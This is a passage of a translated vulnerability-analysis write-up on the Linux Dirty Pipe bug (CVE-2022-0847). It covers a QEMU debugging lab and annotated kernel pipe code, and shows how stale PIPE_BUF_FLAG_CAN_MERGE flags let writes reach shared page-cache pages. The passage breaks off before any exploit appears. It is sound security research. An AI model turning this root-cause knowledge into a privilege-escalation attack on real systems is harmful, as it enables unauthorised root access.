Linux Dirty Pipe CVE-2022-0847 Vulnerability Analysis

Dirty Pipe is a local privilege-escalation vulnerability in the Linux kernel. Its impact is comparable to Dirty COW, but it is considerably easier to exploit.

Affected range: from "pipe: merge anon_pipe_buf*_ops" (linux commit, v5.8-rc1) up to "lib/iov_iter: initialize “flags” in new pipe_buffer" (v5.17-rc6).

In terms of dates, that is roughly 2020/5/21 to 2022/2/21.
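As a rough aid, the window above can be turned into a check on a kernel release string. This is only a sketch: toy_release_in_window is a made-up helper, it assumes that released mainline kernels 5.8 through 5.16 fall inside the window, and it ignores stable or distribution kernels that backported the fix, so a version number alone does not settle whether a given system is vulnerable.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical helper: true if a release string such as "5.10.0-21-amd64"
 * names a mainline series between 5.8 and 5.16 (assumption: backported
 * fixes are not taken into account). */
static bool toy_release_in_window(const char *release)
{
    unsigned int major = 0, minor = 0;

    assert(release != NULL);
    if (sscanf(release, "%u.%u", &major, &minor) != 2)
        return false;               /* not a "major.minor..." string */
    if (major != 5)
        return false;
    return minor >= 8 && minor <= 16;
}
```

The release string would typically come from uname(2); a positive answer only means the kernel is worth a closer look.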

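II. Environment Setup

Following my earlier notes on setting up a Linux pwn environment, build a Linux environment that contains the vulnerability. The commit id used here is f6dd975583bd8ce088400648fd9819e4691c8958.

Here are a few of the scripts.

Relative locations of the key directories:

linux/busybox-1.34.1/_install: location of the busybox file system

linux/myfolder: holds the exp and other files that need to be copied into the VM

Script that boots Linux: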

#! /bin/bash

# Check that we are running as root; elevated privileges are needed for gef-remote --qemu-mode
user=$(env | grep "^USER=" | cut -d "=" -f 2)
if [ "$user" != "root"  ]
  then
    echo "Please run this script as root"
    exit 1
fi

# Compile the POC
g++ ./myfolder/poc.c -o ./myfolder/poc -static
# Copy the files into the rootfs
cp ./myfolder/* busybox-1.34.1/_install

# Build the rootfs
pushd busybox-1.34.1/_install
find . | cpio -o --format=newc > ../../rootfs.img
popd

gnome-terminal -e 'gdb -x mygdbinit'

# Boot qemu (a single -append carries all kernel parameters; a second
# -append would replace the first one)
qemu-system-x86_64 \
    -kernel ./arch/x86/boot/bzImage \
    -initrd ./rootfs.img \
    -append "nokaslr console=ttyS0" \
    -m 2G \
    -s  \
    -S \
    -nographic

gdbinit:

set architecture i386:x86-64
add-symbol-file vmlinux
gef-remote --qemu-mode localhost:1234

# b start_kernel
c

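QEMU reported an error the first time it was started. The cause was that I had forgotten to specify the memory size with -m; adding -m 2G to give QEMU 2 GB of memory fixes it.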

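III. A Quick Look at the Code

Before analyzing the vulnerability we need to get familiar with the code involved, which is also a good opportunity to learn how the pipe mechanism is implemented.

The following files from commit f6dd97 are involved: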

include/linux/pipe_fs_i.h
fs/pipe.c
fs/splice.c
lib/iov_iter.c

1. pipe-related structures

a. pipe_inode_info

The pipe_inode_info structure holds the fields that the pipe mechanism needs:

/**
 *  struct pipe_inode_info - a linux kernel pipe
 *  @mutex: mutex protecting the whole thing
 *  @rd_wait: reader wait point in case of empty pipe
 *  @wr_wait: writer wait point in case of full pipe
 *  @head: The point of buffer production
 *  @tail: The point of buffer consumption
 *  @max_usage: The maximum number of slots that may be used in the ring
 *  @ring_size: total number of buffers (should be a power of 2)
 *  @tmp_page: cached released page
 *  @readers: number of current readers of this pipe
 *  @writers: number of current writers of this pipe
 *  @files: number of struct file referring this pipe (protected by ->i_lock)
 *  @r_counter: reader counter
 *  @w_counter: writer counter
 *  @fasync_readers: reader side fasync
 *  @fasync_writers: writer side fasync
 *  @bufs: the circular array of pipe buffers
 *  @user: the user who created this pipe
 **/
struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
};

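Small as it is, this structure has everything it needs: the wait queues for readers and writers of the pipe, the size of the pipe, the array that points at the actual memory, and so on.

A pipe stores its data in a ring queue: data is stored, as far as it fits, on a fixed-size ring of buffers (the pipe buf ring). A few fields therefore deserve a brief explanation:

head: index of the front of the queue. Note that the unit of the index is one pipe_buffer. head is the position that will be written next.

tail: index of the back of the queue. tail is the position that will be read next.

The relationship between the two fields looks roughly like this: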

low addr                                 high addr
+--------------------------------------------+
|  |  |  |  |  |  |  | >|//|//|//|> |  |  |  |
+--------------------------------------------+
                       A   ---->   A
                       |           |
                     tail         head

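head points at the slot that will be filled next, one past the newest buffer (much like the STL end() method), while tail points at the oldest buffer that still holds unread data.

max_usage: the maximum number of pipe_buffer slots that may be used; this field bounds the amount of data the whole pipe can hold.
ring_size: the total number of pipe_buffer slots allocated; note that this value must be a power of 2.
files: the number of struct file objects that refer to this pipe, i.e. how many open file instances share it.
tmp_page: caches a previously released page so that it can be reused, lowering reallocation cost.
bufs: the array that actually holds the pipe_buffer entries; by design this one-dimensional array is treated as a ring.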
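To make the roles of head, tail and the ring more concrete, here is a small user-space model. It is only an illustration: struct toy_ring, toy_ring_push and toy_ring_pop are invented names, and plain ints stand in for pipe_buffer entries.

```c
#include <assert.h>
#include <stdbool.h>

#define TOY_RING_SIZE 4u   /* must be a power of two, like ring_size */

struct toy_ring {
    unsigned int head;            /* next slot to fill (producer side) */
    unsigned int tail;            /* next slot to drain (consumer side) */
    int slots[TOY_RING_SIZE];     /* stands in for bufs[] */
};

/* Store one value at head; fails when every slot is in use. */
static bool toy_ring_push(struct toy_ring *r, int value)
{
    /* the mask trick below only works for power-of-two sizes */
    assert((TOY_RING_SIZE & (TOY_RING_SIZE - 1)) == 0);
    if (r->head - r->tail >= TOY_RING_SIZE)
        return false;
    r->slots[r->head & (TOY_RING_SIZE - 1)] = value;
    r->head++;                    /* the index keeps growing, only the slot wraps */
    return true;
}

/* Take the oldest value from tail; fails when the ring is empty. */
static bool toy_ring_pop(struct toy_ring *r, int *value)
{
    if (r->head == r->tail)
        return false;
    *value = r->slots[r->tail & (TOY_RING_SIZE - 1)];
    r->tail++;
    return true;
}
```

Note that head and tail are never reduced modulo the ring size; only the slot lookup applies the mask, which is the same convention the kernel code below relies on.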

b. pipe_buffer

Next, a closer look at struct pipe_buffer, which describes the data actually stored in the pipe:

/**
 *  struct pipe_buffer - a linux kernel pipe buffer
 *  @page: the page containing the data for the pipe buffer
 *  @offset: offset of data inside the @page
 *  @len: length of data inside the @page
 *  @ops: operations associated with this buffer. See @pipe_buf_operations.
 *  @flags: pipe buffer flags. See above.
 *  @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

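This structure holds key information such as the page reference, the offset within the page, and the data length. The possible values of flags are: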

// include/linux/pipe_fs_i.h
#define PIPE_BUF_FLAG_LRU       0x01    /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC    0x02    /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT      0x04    /* page is a gift */
#define PIPE_BUF_FLAG_PACKET    0x08    /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10    /* can merge buffers */

For now we do not need to worry about what each flag means.

c. iov_iter

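struct iov_iter is used to iterate over data that is split across multiple pages; in other words, it walks through the data page by page. The structure is defined as follows: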

enum iter_type {
    /* iter types */
    ITER_IOVEC = 4,
    ITER_KVEC = 8,
    ITER_BVEC = 16,
    ITER_PIPE = 32,    // the data being iterated lives in a pipe
    ITER_DISCARD = 64,
};

struct iov_iter {
    /*
     * Bit 0 is the read/write bit, set if we're writing.
     * Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
     * the caller isn't expecting to drop a page reference when done.
     */
    unsigned int type;
    size_t iov_offset;
    size_t count;
    union {
        const struct iovec *iov;
        const struct kvec *kvec;
        const struct bio_vec *bvec;
        struct pipe_inode_info *pipe;
    };
    union {
        unsigned long nr_segs;
        struct {
            unsigned int head;
            unsigned int start_head;
        };
    };
};

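The meaning of some of the fields:

type: indicates what kind of structure the iterated data comes from, for example:
- ITER_PIPE means the data being iterated is page data inside a pipe
- ITER_DISCARD means all data written to this iov_iter is discarded.
Later memory reads and writes on the iov_iter are dispatched on this type.
iov_offset: offset within the page currently being iterated; reads and writes start from this offset.
count: number of bytes that remain to be read or written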
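The dispatch on type can be sketched in user space as follows. The numeric values are taken from the enum above and bit 0 is treated as the direction bit; the toy_ names and the toy_path enum are invented for this illustration, and the order of the checks follows the copy_page_to_iter listing in section 3.

```c
#include <assert.h>
#include <stdbool.h>

#define TOY_ITER_IOVEC   4u
#define TOY_ITER_KVEC    8u
#define TOY_ITER_BVEC    16u
#define TOY_ITER_PIPE    32u
#define TOY_ITER_DISCARD 64u
#define TOY_DIR_MASK     1u    /* bit 0: read/write direction */

enum toy_path { TOY_PATH_KERNEL_COPY, TOY_PATH_DISCARD, TOY_PATH_IOVEC, TOY_PATH_PIPE };

/* Strip the direction bit so that only the iterator kind remains. */
static unsigned int toy_iter_kind(unsigned int type)
{
    return type & ~TOY_DIR_MASK;
}

static bool toy_iter_is_pipe(unsigned int type)
{
    return toy_iter_kind(type) == TOY_ITER_PIPE;
}

/* Which branch a page copy would take for this iterator type. */
static enum toy_path toy_copy_path(unsigned int type)
{
    unsigned int kind = toy_iter_kind(type);

    assert(kind != 0);            /* a valid iterator has exactly one kind bit */
    if (kind & (TOY_ITER_BVEC | TOY_ITER_KVEC))
        return TOY_PATH_KERNEL_COPY;
    if (kind == TOY_ITER_DISCARD)
        return TOY_PATH_DISCARD;
    if (!toy_iter_is_pipe(type))
        return TOY_PATH_IOVEC;
    return TOY_PATH_PIPE;
}
```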

2. The pipe_read function

pipe_read lives in fs/pipe.c; the kernel calls it whenever data needs to be read from a pipe:

const struct file_operations pipefifo_fops = {
    .open             = fifo_open,
    .llseek           = no_llseek,
    .read_iter        = pipe_read,     // read
    .write_iter       = pipe_write,    // write
    .poll             = pipe_poll,
    .unlocked_ioctl   = pipe_ioctl,
    .release          = pipe_release,
    .fasync           = pipe_fasync,
};

First, the function is declared as follows:

static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)

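We do not need to memorize these structures; it is enough to know that:

iocb: holds the pointer through which the current pipe structure is obtained
to: where the data read from the pipe will be written, an iov_iter iterator.

Next, the kernel takes the number of bytes to read from to and the pipe_inode_info structure from iocb; if the number of bytes to read is 0 it returns immediately: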

size_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool was_full, wake_next_reader = false;
ssize_t ret;

/* Null read succeeds. */
if (unlikely(total_len == 0))
    return 0;

ret = 0;
__pipe_lock(pipe);

Next, the kernel checks whether the pipe is full and records the result in was_full:

was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);

This flag matters little for the main logic; it is mentioned here to see how a pipe decides whether it is full:

/**
 * pipe_occupancy - Return number of slots used in the pipe
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 */
static inline unsigned int pipe_occupancy(unsigned int head, unsigned int tail)
{
    return head - tail;
}

/**
 * pipe_full - Return true if the pipe is full
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 * @limit: The maximum amount of slots available.
 */
static inline bool pipe_full(unsigned int head, unsigned int tail,
                 unsigned int limit)
{
    return pipe_occupancy(head, tail) >= limit;
}

As we can see, if pipe->head - pipe->tail >= pipe->max_usage, the pipe's data area is full. Correspondingly, checking whether the pipe is empty is just as simple:

/**
 * pipe_empty - Return true if the pipe is empty
 * @head: The pipe ring head pointer
 * @tail: The pipe ring tail pointer
 */
static inline bool pipe_empty(unsigned int head, unsigned int tail)
{
    return head == tail;
}
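Because head and tail are free-running unsigned counters, these helpers keep working even after the counters wrap around. A minimal user-space sketch (the toy_ names are invented here, and the functions simply restate the kernel helpers above):

```c
#include <assert.h>
#include <stdbool.h>

/* Number of used slots; unsigned subtraction is well defined modulo 2^N,
 * so the result stays correct after head has wrapped past zero. */
static unsigned int toy_occupancy(unsigned int head, unsigned int tail)
{
    return head - tail;
}

static bool toy_full(unsigned int head, unsigned int tail, unsigned int limit)
{
    assert(limit > 0);
    return toy_occupancy(head, tail) >= limit;
}

static bool toy_empty(unsigned int head, unsigned int tail)
{
    return head == tail;
}
```

For example, with tail three steps before the wrap point and head three steps after it, toy_occupancy still reports six used slots.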

Back in pipe_read, the kernel then reads the pipe in a loop:

for (;;) {
    unsigned int head = pipe->head;
    unsigned int tail = pipe->tail;
    // note that pipe->ring_size is a power of 2, so ring_size-1 in binary is 0b1111...111
    unsigned int mask = pipe->ring_size - 1;
    // if the pipe contains data
    if (!pipe_empty(head, tail)) {
        // get the pipe_buffer that tail refers to; note that head and tail may exceed max_usage, because the pipe_buffer array is designed to be used as a ring
        struct pipe_buffer *buf = &pipe->bufs[tail & mask];
        // size of the data in the buf being read
        size_t chars = buf->len;
        size_t written;
        int error;

        // if the buf holds more data than was requested, truncate
        if (chars > total_len)
            chars = total_len;
        // call the pipe_buf confirm method to make sure the data in the pipe buffer is valid
        error = pipe_buf_confirm(pipe, buf);
        if (error) {
            if (!ret)
                ret = error;
            break;
        }

        // write the memory page of the current pipe buffer into to
        written = copy_page_to_iter(buf->page, buf->offset, chars, to);
        // if fewer bytes were written than requested, an unrecoverable error occurred while writing; bail out
        if (unlikely(written < chars)) {
            if (!ret)
                ret = -EFAULT;
            break;
        }
        // one round of reading is done; if bytes remain to be read, get ready to loop again
        ret += chars;
        buf->offset += chars;
        buf->len -= chars;

        /* Was it a packet buffer? Clean up and exit */
        // set when the fd referring to this pipe has O_DIRECT; see pipe_write for how the flag is used
        if (buf->flags & PIPE_BUF_FLAG_PACKET) {
            total_len = chars;
            buf->len = 0;
        }
        // if the current pipe buffer has been read completely, advance tail to the next pipe buffer
        if (!buf->len) {
            pipe_buf_release(pipe, buf);
            spin_lock_irq(&pipe->rd_wait.lock);
            tail++;
            pipe->tail = tail;
            spin_unlock_irq(&pipe->rd_wait.lock);
        }
        total_len -= chars;
        // if everything requested has been read, we are done
        if (!total_len)
            break;    /* common path: read succeeded */
        // if more data is wanted and the pipe still has some, keep looping
        if (!pipe_empty(head, tail))    /* More to do? */
            continue;
    }

    if (!pipe->writers)
        break;
    if (ret)
        break;
    if (filp->f_flags & O_NONBLOCK) {
        ret = -EAGAIN;
        break;
    }
    __pipe_unlock(pipe);

    /*
     * We only get here if we didn't actually read anything.
     * ...
     */
    ...;
}
...;

return ret;
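The effect of PIPE_BUF_FLAG_PACKET can be observed from user space. The sketch below assumes a Linux system where pipe2() accepts O_DIRECT; toy_first_read_len is an invented helper. It writes two messages and reports how many bytes the first read() returns.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <unistd.h>

/* Write two messages back to back, then return how many bytes the first
 * read() delivers. pipe_flags is 0 (byte stream) or O_DIRECT (packets).
 * Returns -1 on any failure. */
static ssize_t toy_first_read_len(int pipe_flags)
{
    int p[2];
    char buf[64];
    ssize_t n = -1;

    assert(pipe_flags == 0 || pipe_flags == O_DIRECT);
    if (pipe2(p, pipe_flags) != 0)
        return -1;
    if (write(p[1], "abc", 3) == 3 && write(p[1], "defgh", 5) == 5)
        n = read(p[0], buf, sizeof(buf));
    close(p[0]);
    close(p[1]);
    return n;
}
```

With pipe_flags set to 0 both writes are read back together (8 bytes), while with O_DIRECT the first read() stops at the end of the first packet (3 bytes), which is the total_len = chars shortcut in the listing above.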

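3. copy_page_to_iter and related functions

The comments in pipe_read give the rough flow of reading from a pipe. Within it, copy_page_to_iter picks a different operation depending on the type field of to.

Overall, though, its job is still to copy the given page to wherever the iov_iter points: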

// include/linux/uio.h
static __always_inline __must_check
size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    if (unlikely(!check_copy_size(addr, bytes, true)))
        return 0;
    else
        return _copy_to_iter(addr, bytes, i);
}

// lib/iov_iter.c
size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    // check that the copy stays in bounds; this check normally passes
    if (unlikely(!page_copy_sane(page, offset, bytes)))
        return 0;
    if (i->type & (ITER_BVEC|ITER_KVEC)) {
        void *kaddr = kmap_atomic(page);
        size_t wanted = copy_to_iter(kaddr + offset, bytes, i);
        kunmap_atomic(kaddr);
        return wanted;
    } else if (unlikely(iov_iter_is_discard(i)))
        return bytes;
    else if (likely(!iov_iter_is_pipe(i))) 
        return copy_page_to_iter_iovec(page, offset, bytes, i);
    else // (i->type & ~(READ | WRITE)) == ITER_PIPE
        return copy_page_to_iter_pipe(page, offset, bytes, i);
}

Here we only care about how data is copied when to is itself a pipe, i.e. the copy_page_to_iter_pipe function. The whole function is quite short:

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    // the pipe structure to write into
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    // some information about the destination pipe, such as head and tail
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;

    // a few checks
    if (unlikely(bytes > i->count))
        bytes = i->count;

    if (unlikely(!bytes))
        return 0;

    if (!sanity(i))
        return 0;

    // relative offset to write at
    off = i->iov_offset;
    // the pipe buf that will receive the data
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {
        if (offset == off && buf->page == page) {
            /* merge with the last one */
            buf->len += bytes;
            i->iov_offset += bytes;
            goto out;
        }
        i_head++;
        buf = &pipe->bufs[i_head & p_mask];
    }
    // if the destination pipe is full, return immediately
    if (pipe_full(i_head, p_tail, pipe->max_usage))
        return 0;

    buf->ops = &page_cache_pipe_buf_ops;
    // increment the refcount of the page
    get_page(page);
    buf->page = page;   // reference the existing page directly
    buf->offset = offset;
    buf->len = bytes;

    pipe->head = i_head + 1;
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}

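The key point: when data from a new page is copied into the receiving pipe buf, the receiving pipe buf simply references that page and records the offset, len and so on of this copy, avoiding the cost of copying the data. If every copy comes from a different page, the receiving pipe bufs hold references to different pages, and the offset and len of each may cover only part of its page.

Note: because the pipe buf here references someone else's page directly, pipe_write must make sure that newly arriving data is never written into such a page, and that guarantee rests on the PIPE_BUF_FLAG_CAN_MERGE flag.

Here we can see something interesting: although many fields of the receiving pipe buf structure are reassigned, one field is left out, and that is the flags field!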

4. copy_to_iter and related functions

Besides pipe_read calling copy_page_to_iter, which in turn reaches copy_page_to_iter_pipe to deliver data to a pipe, the copy_to_iter function can also be used to pass data to a pipe:

static __always_inline __must_check
size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    if (unlikely(!check_copy_size(addr, bytes, true)))
        return 0;
    else
        return _copy_to_iter(addr, bytes, i);
}

size_t _copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
    const char *from = addr;
    if (unlikely(iov_iter_is_pipe(i))) // pipe case
        return copy_pipe_to_iter(addr, bytes, i);
    if (iter_is_iovec(i))
        might_fault();
    iterate_and_advance(i, bytes, v,
        copyout(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len),
        memcpy_to_page(v.bv_page, v.bv_offset,
                   (from += v.bv_len) - v.bv_len, v.bv_len),
        memcpy(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len)
    )

    return bytes;
}

copy_to_iter has many call sites, so there is very likely at least one that uses it to write data into a pipe. In that case control flows through copy_to_iter -> _copy_to_iter -> copy_pipe_to_iter to reach the code that actually copies the data:

static size_t copy_pipe_to_iter(const void *addr, size_t bytes,
                struct iov_iter *i)
{
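    // get the pipe structure
    struct pipe_inode_info *pipe = i->pipe;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head;
    size_t n, off;
    // run the check
    if (!sanity(i))
        return 0;

    /*  From the code we can infer what push_pipe does:
        1. work out how many bytes can be written to the pipe (it may not be big enough)
        2. prepare the pipe_bufs that will receive the data
        3. get the current head position of the pipe
        4. get the relative offset off within the page that will be written
    */
    // n is the number of bytes to write
    bytes = n = push_pipe(i, bytes, &i_head, &off);
    // nothing to write: return immediately; this branch is unlikely to be taken
    if (unlikely(!n))
        return 0;
    // write into the pipe in a loop until all data has been written; each iteration either fills the page to its end or writes the final partial chunk
    do {
        // size that can be written in this iteration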
        size_t chunk = min_t(size_t, n, PAGE_SIZE - off);
        memcpy_to_page(pipe->bufs[i_head & p_mask].page, off, addr, chunk);
        i->head = i_head;
        i->iov_offset = off + chunk;
        n -= chunk;
        addr += chunk;
        off = 0;
        i_head++;
    } while (n);
    // update the number of bytes left in this iov_iter
    i->count -= bytes;
    return bytes;
}

Next let us look at push_pipe; as the annotations above suggest, this function is fairly important:

static size_t push_pipe(struct iov_iter *i, size_t size,
            int *iter_headp, size_t *offp)
{
    // the pipe that receives the data
    struct pipe_inode_info *pipe = i->pipe;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int iter_head;
    size_t off;
    ssize_t left;
    // routine checks, not discussed here
    if (unlikely(size > i->count))
        size = i->count;
    if (unlikely(!size))
        return 0;

    left = size;
    /* data_start fetches the pipe's head and starting offset.
       It also filters out the cases where head refers to a pipe buf that has
       not been allocated yet, or where offset == PAGE_SIZE */
    data_start(i, &iter_head, &off);
    *iter_headp = iter_head;
    *offp = off;
    // if writing starts in the middle of a page
    if (off) {
        // check whether the rest of this page is enough
        left -= PAGE_SIZE - off;
        // if it is, return right away
        if (left <= 0) {
            pipe->bufs[iter_head & p_mask].len += size;
            return size;
        }
        // if not, first extend this partially filled page to a full page
        pipe->bufs[iter_head & p_mask].len = PAGE_SIZE;
        iter_head++;
    }
    // from here on, add pages in a loop
    while (!pipe_full(iter_head, p_tail, pipe->max_usage)) {
        // fetch each pipe_buffer in turn and initialize its fields
        struct pipe_buffer *buf = &pipe->bufs[iter_head & p_mask];
        struct page *page = alloc_page(GFP_USER);
        if (!page)
            break;

        buf->ops = &default_pipe_buf_ops;
        buf->page = page;
        buf->offset = 0;
        buf->len = min_t(ssize_t, left, PAGE_SIZE);
        left -= buf->len;
        /* !!! Note that the flags field of buf is not initialized here, so it keeps whatever value the old pipe_buffer in this slot had */
        iter_head++;
        pipe->head = iter_head;

        if (left == 0)
            return size;
    }
    return size - left;
}

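In push_pipe we can see that when the kernel adds pages to the pipe_buffer ring in a loop, the flags field of each pipe_buffer is not initialized here either! And because the pipe_buffer array is by design a ring, extending it reuses the flags that an earlier pipe_buffer left in the same slot.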
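The arithmetic at the start of push_pipe can be replayed in isolation. The helper below is a hypothetical user-space restatement (toy_new_buffers_needed is not a kernel function); it assumes a 4096-byte page, assumes 0 <= off < PAGE_SIZE, and ignores the pipe_full limit, so it only answers how many fresh slots a request would like to claim.

```c
#include <assert.h>

#define TOY_PAGE_SIZE 4096LL   /* assumed page size */

/* How many new pipe_buffer slots a push of `size` bytes would ask for
 * when the current page is already filled up to `off`. */
static long long toy_new_buffers_needed(long long size, long long off)
{
    long long left = size;

    assert(size >= 0 && off >= 0 && off < TOY_PAGE_SIZE);
    if (size == 0)
        return 0;
    if (off) {
        left -= TOY_PAGE_SIZE - off;   /* room left in the current page */
        if (left <= 0)
            return 0;                  /* everything fits in that page */
    }
    return (left + TOY_PAGE_SIZE - 1) / TOY_PAGE_SIZE;   /* round up */
}
```

Every slot counted here is one whose flags field would be left as it was.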

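To summarize how copy_page_to_iter and copy_to_iter differ when copying data into a pipe:

The former copies data that sits on a complete page into the pipe. The pipe buf therefore only needs to reference that page and record offset and len to complete the copy.

The latter gives no guarantee that the source data sits on a complete page; it supplies addr and len instead, so the pipe buf has to provide its own page to hold the data.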

5. The pipe_write function

This time we only look at the two most essential parts. The first is page merging:

head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
    unsigned int mask = pipe->ring_size - 1;
    struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
    int offset = buf->offset + buf->len;

    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
        offset + chars <= PAGE_SIZE) {
        ret = pipe_buf_confirm(pipe, buf);
        if (ret)
            goto out;

        ret = copy_page_from_iter(buf->page, offset, chars, from);
        if (unlikely(ret < chars)) {
            ret = -EFAULT;
            goto out;
        }

        buf->len += ret;
        if (!iov_iter_count(from))
            goto out;
    }
}

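If the pipe already holds data and the bytes to be written fit into the space remaining in the most recent pipe buf, the new data is written straight into that pipe buf and merged with the data already there. The merge requires the pipe buf to carry the PIPE_BUF_FLAG_CAN_MERGE flag, which pipe_write sets automatically as long as the fd being written does not have O_DIRECT set.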
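The merge decision boils down to a small predicate. The following user-space restatement is a sketch only: toy_write_merges is an invented name, the flag value is copied from the header shown earlier, and a 4096-byte page is assumed.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define TOY_PAGE_SIZE      4096u   /* assumed page size */
#define TOY_FLAG_CAN_MERGE 0x10u   /* same value as PIPE_BUF_FLAG_CAN_MERGE */

/* Would a write of total_len bytes append to the newest buffer (described
 * by flags, buf_offset and buf_len) instead of claiming a new slot? */
static bool toy_write_merges(unsigned int flags, unsigned int buf_offset,
                             unsigned int buf_len, size_t total_len,
                             bool pipe_was_empty)
{
    size_t chars = total_len & (TOY_PAGE_SIZE - 1);   /* sub-page remainder */

    assert(buf_offset + buf_len <= TOY_PAGE_SIZE);
    if (chars == 0 || pipe_was_empty)
        return false;
    return (flags & TOY_FLAG_CAN_MERGE) &&
           buf_offset + buf_len + chars <= TOY_PAGE_SIZE;
}
```

Nothing in this predicate asks who owns the page, which is why a buffer that wrongly carries the flag is enough to redirect the write.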

The second is the normal page-writing logic:

for (;;) {
    // a pipe without readers is broken: raise SIGPIPE
    if (!pipe->readers) {
        send_sig(SIGPIPE, current, 0);
        if (!ret)
            ret = -EPIPE;
        break;
    }
    // try to write data into the pipe in a loop
    head = pipe->head;
    if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[head & mask];
        struct page *page = pipe->tmp_page;
        int copied;
        // fetch tmp_page, a page that was released earlier but kept cached.
        // if tmp_page exists it can be reused for this pipe buf without allocating
        if (!page) {
            page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
            if (unlikely(!page)) {
                ret = ret ? : -ENOMEM;
                break;
            }
            pipe->tmp_page = page;
        }

        /* Allocate a slot in the ring in advance and attach an
         * empty buffer.  If we fault or otherwise fail to use
         * it, either the reader will consume it or it'll still
         * be there for the next write.
         */
        spin_lock_irq(&pipe->rd_wait.lock);

        head = pipe->head;
        if (pipe_full(head, pipe->tail, pipe->max_usage)) {
            spin_unlock_irq(&pipe->rd_wait.lock);
            continue;
        }

        pipe->head = head + 1;
        spin_unlock_irq(&pipe->rd_wait.lock);

        /* Insert it into the buffer array */
        // fill in the new pipe buf
        buf = &pipe->bufs[head & mask];
        buf->page = page;
        buf->ops = &anon_pipe_buf_ops; // anonymous pipe operations
        buf->offset = 0;
        buf->len = 0;
        // if the fd has O_DIRECT set, every write takes a new page and is never merged
        if (is_packetized(filp))
            buf->flags = PIPE_BUF_FLAG_PACKET;
        else
            buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
        pipe->tmp_page = NULL;
        // copy the page data
        copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
        if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
            if (!ret)
                ret = -EFAULT;
            break;
        }
        ret += copied;
        buf->offset = 0;
        buf->len = copied;

        if (!iov_iter_count(from))
            break;
    }

    if (!pipe_full(head, pipe->tail, pipe->max_usage))
        continue;

    /* Wait for buffer space to become available. */
    if (filp->f_flags & O_NONBLOCK) {
        if (!ret)
            ret = -EAGAIN;
        break;
    }
    if (signal_pending(current)) {
        if (!ret)
            ret = -ERESTARTSYS;
        break;
    }
    ...
}

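A quick word about tmp_page. If the page held by a pipe buf is referenced by nobody else and is about to be released, the pipe quietly keeps the page instead of freeing it and caches it for later use: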

static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
                  struct pipe_buffer *buf)
{
    struct page *page = buf->page;

    /*
     * If nobody else uses this page, and we don't already have a
     * temporary page, let's keep track of it as a one-deep
     * allocation cache. (Otherwise just release our reference to it)
     */
    if (page_count(page) == 1 && !pipe->tmp_page)
        pipe->tmp_page = page;
    else
        put_page(page);
}
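The one-deep cache idea is easy to model outside the kernel. In the sketch below struct toy_pipe, toy_page_get and toy_page_put are invented names, malloc stands in for alloc_page, and the page_count(page) == 1 test is left out because the toy has no reference counting.

```c
#include <assert.h>
#include <stdlib.h>

#define TOY_PAGE_SIZE 4096u   /* assumed page size */

struct toy_pipe {
    void *tmp_page;           /* one-deep cache, like pipe->tmp_page */
};

/* Get a page for a new buffer, preferring the cached one. */
static void *toy_page_get(struct toy_pipe *tp)
{
    void *page = tp->tmp_page;

    if (page) {
        tp->tmp_page = NULL;  /* the cache slot is empty again */
        return page;
    }
    return malloc(TOY_PAGE_SIZE);
}

/* Release a page: park it in the cache if the slot is free, else free it. */
static void toy_page_put(struct toy_pipe *tp, void *page)
{
    assert(page != NULL);
    if (!tp->tmp_page)
        tp->tmp_page = page;
    else
        free(page);
}
```

A write that follows a full drain therefore usually gets its page back without going to the allocator.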

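From the pipe read and write paths we can see that the pages held in pipe bufs come in just two kinds:

References to pages that must not change (file cache pages, for example), so that no data has to be copied

Pages the pipe created itself, which require the data to be copied

It is up to the pipe machinery to guarantee that page data stored in pipe bufs is never overwritten by the pipe itself. Note also that merging is only allowed on pages the pipe created itself.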

6. The do_splice function

